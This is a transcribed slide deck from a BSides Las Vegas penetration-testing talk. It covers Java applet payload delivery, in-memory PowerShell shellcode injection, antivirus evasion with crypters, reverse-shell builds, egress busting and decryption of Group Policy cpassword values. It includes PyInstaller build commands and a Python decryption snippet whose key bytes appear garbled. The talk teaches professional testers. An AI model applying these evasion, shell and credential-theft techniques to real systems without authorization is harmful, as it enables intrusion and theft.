BSIDES Las Vegas Secret Pentesting Techniques Shhh...

Transcription

1 BSIDES Las Vegas Secret Pentesting Techniques Shhh... Dave Kennedy Founder, Principal Security Consultant

2 Introduc)on As penetration testers, exploit writers, huggers, etc. we have secret techniques we always use. Although some may or may not be public, they are generally obscure and not well known.

3 The purpose of today s talk is to show you my secrets.. Some of my techniques that I use that aren t widely known. Why show you? I m an open book on everything I do and sharing is what it s all about.

4 Technique #1 Java Applet Attack (SET) Well known attack method right? Do you know how it actually works? Do you know the techniques behind it to make it successful?

5 ZOMG APT News agencies around the world discovered a new and extremely advanced zero-day exploit against Java. Made me feel kind of special =) How people found out it was set?

6 ILIKEHUGS

7 DEMO: Walking through the Attack

8 Explaining the Applet Parameters that are injected into the HTML code are pulled from the Applet. Obfuscated and randomized each time. Parameters tell the Applet which attacks to use.

9 Method 1 Binary Dropper Binary is downloaded from attacker machine via web server (Java downloader) Obfuscated binary each time per deployment.. Combination of PE manipulation, UPX, and rewriting binary on fly (import pefile)

10 DEMO: Binary Dropping Technique

11 Method 1 Weak Sauce Binary s are easily picked up by AV if signatures focus on obfuscation techniques. (SET changes them each version) Direct interaction with Windows file system and writing to disk. Multiple points of evidence on victim machine.

12 Method 2 Shellcodeexec Shellcodeexec method drops a custom compiled and modified version of shellcodeexec by Bernardo Damele. Executable takes int main(int argc, char*argv[]) parameter for alphanumeric shellcode. Uses VirtualAlloc for read, write, and execute memory space. Alphanumeric shellcode is executed in memory and payload is delivered.

13 DEMO: ShellcodeExec

14 Method 2 Easily detectable Shellcodeexec is a simple yet awesome method but still has a number of drawbacks. Like Method 1 Binary s can be picked up unless custom version created. Direct interaction with Windows file system and writing to disk. Like Method 1 - Multiple points of evidence on victim machine.

15 Method 3 Powershell Injec)on Detect if Powershell is installed (installed by default on Vista and Windows 7 and 8). Powershell gives us complete flexibility on a number of post exploitation situations. Technique discovered by Matthew Graeber (you rock).

16 Method 3 PS ShellCode Injec)on Applet detects if powershell is installed on system. Grabs the operating system type (x86 / x64) Deploys Shellcode straight through powershell.

17 DEMO: ShellcodeExec

18 Method 3 Powershell Injec)on Never touches disk AV / HIPS signatures go out the door. Obfuscated each time so that memory inspection is extremely difficult. Extremely reliable and stable.

19 PE Security Evasion

20 Scenario 1 Dropping PE s like its hot Your using Metasploit All of them are being picked up by AV, HIPS, etc. Most cases, I will rewrite the exe template for Metasploit to customize binary for evasion. Couple cool ways to do this.

21 Modifying PE For Evasion in MSF Easiest way for me is to make a simple program that creates a RWX process then have the program execute Metasploit Shellcode. You can also modify the Metasploit exe.rb template and obfuscate the code that way.

22 PE Crypters One of my favorites was recently released called Hyperion (Christian Ammann from nullsecurity.net). Encrypts PE the file using a randomized simple cipher key with AES 128. When executable is run, it brute forces the AES key then decrypts the PE file for you.

23 DEMO: Hyperion

24 Hyperion Encryp)on Very cool concept and easy to use and write one for yourself. Ability to have a completely unique PE file each time. Slight downfall, stub used for brute force is not polymorphic.

25 Building a Simple Reverse Shell

26 The Reverse Shell Connects out to the attacker (reverse shell).

27 Compiling Binaries PyInstaller Compiles python code for you into a binary by wrapping the Python Interpreter into the executable. Works on Linux, OSX, and Windows. python Configure.py python Makespec.py onefile noconsole shell.py python Build.py shell/shell.spec cd shell\dist

28 Making it easy pybuild.py All code and samples will be released on the TrustedSec website soon.

29 DEMO: Building a Shell

30 Bypassing AV

31 Finding your way home

32 Bumping the Firewall A number of companies restrict ports outbound and only allow what s needed for the business. Trouble getting payloads out, especially if you only have one shot.

33 Egress Bus)ng Few ways to do it, pre-staged payload for identifying way out. Attempt staged reverse on every port. Metasploit has an ALLPORTS payload as well.

34 Egress Buster 0.2 Server/Client situation where victim connects out on every port 1024 ports at a time. Server listens for connection and reports back. Here s where you can have some fun.

35 Egress Buster Reverse Shell

36 Egress Buster Reverse Shell Released this week! Allows you to bust all ports inside the firewall and spawn a command shell. Custom, so no AV picks this up. Byte compiled into an executable.

37 DEMO: Egress Buster Reverse Shell

38 Egress Buster Reverse Shell Usage Recent Penetration Test Found file upload + execute binary s. Could not find a standard port out i.e. 80, 443, 53, 25, etc. Wrote this to deploy and found several obscure ports that were allowed.

39 Fun with Group Policy

40 One of my PERSONAL Favorites How many times have we been on a pentest with just a domain user? Need that local administrator account for all of the domain computers? Research from: Sogeti ESEC Pentest Article: exploiting-windows-2008-group-policypreferences

41 The AZack Navigate to a domain controller and hit up the SYSVOL share. Head to the domain name and Policies folder. Look for a GUID then MACHINE \Preferences\Group. Look for the Groups.xml file.

42 Contents of File

43 Sta)c Key for AES Anyone?

44 Python Code # code was developed and created from # from Crypto.Cipher import AES from base64 import b64decode key = """ 4e e8 fc b6 6c c9 fa f f fe e8 f4 96 e8 06 cc b 09 a4 33 b6 6c 1b """.replace(" ","").replace("\n","").decode('hex') cpassword = b64decode("j1uyj3vx8ty9ltlzil2uauzkfqa/4latt76zwgdhdhw=") o = AES.new(key, 2).decrypt(cpassword) print o[:-ord(o[-1])].decode('utf16')

45 Decrypted Password >>> print o[:-ord(o[-1])].decode('utf16') Local*P4ssword!

46 Expanding on Group.xml

47 More Passwords Stored The folks over at rewt dance ( /06/exploiting-windows group-policy.html) found a few more areas that store passwords using the cpassword attribute. Services, ScheduledTasks, SQL servers and much more are impacted.

48 List of Other Affected Areas (from rewt dance) Services\Services.xml ScheduledTasks\ScheduledTasks.xml Printers\Printers.xml Drives\Drives.xml DataSources\DataSources.xml

49 There s a ton more of these Hopefully can make these a series.

50

51 Downloads For the code and tools used in this presentation, head over to and click on the Downloads.

52 Secret Pentesting Techniques Shhh... Dave Kennedy Founder, Principal Security Consultant TrustedSec,